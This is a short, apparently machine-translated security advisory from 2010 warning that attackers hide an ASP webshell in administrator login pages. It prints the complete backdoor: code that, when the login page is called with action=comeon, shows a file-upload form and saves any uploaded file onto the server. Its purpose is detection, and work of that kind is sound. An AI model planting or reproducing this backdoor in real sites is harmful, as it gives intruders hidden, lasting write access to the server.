Hidden in the administrator login page of the hazard-vulnerability warning-the black bar safety net

2010-03-29T00:00:00
ID MYHACK58:62201026581
Type myhack58
Reporter 佚名
Modified 2010-03-29T00:00:00

Description

If your site is being invaded, you hard to erase later, not several days. And“disease”. Suggest you look at your admin login page there is no similar to the following code:

<%if request. QueryString("action")="comeon" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobject(b):c. Type=1:c. Open:c. The Write Request. BinaryRead(a):c. Position=0:d=c. Read:e=chrB(1 3)&chrB(1 0):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h. Type=1:h. Open:c. Position=f+1:c. Copyto h,g-f-3:h. Position=0:h. type=2:h. CharSet="BIG5":i=h. Readtext:h. close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h. Type=1:h. Open:c. Position=k-1:c. CopyTo h,l:h.SaveToFile server. mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> <%end if%>

  1. The surface is no difference of this is hidden WEBSHELL

As long as this: login. asp? action=comeon

Appears the upload page!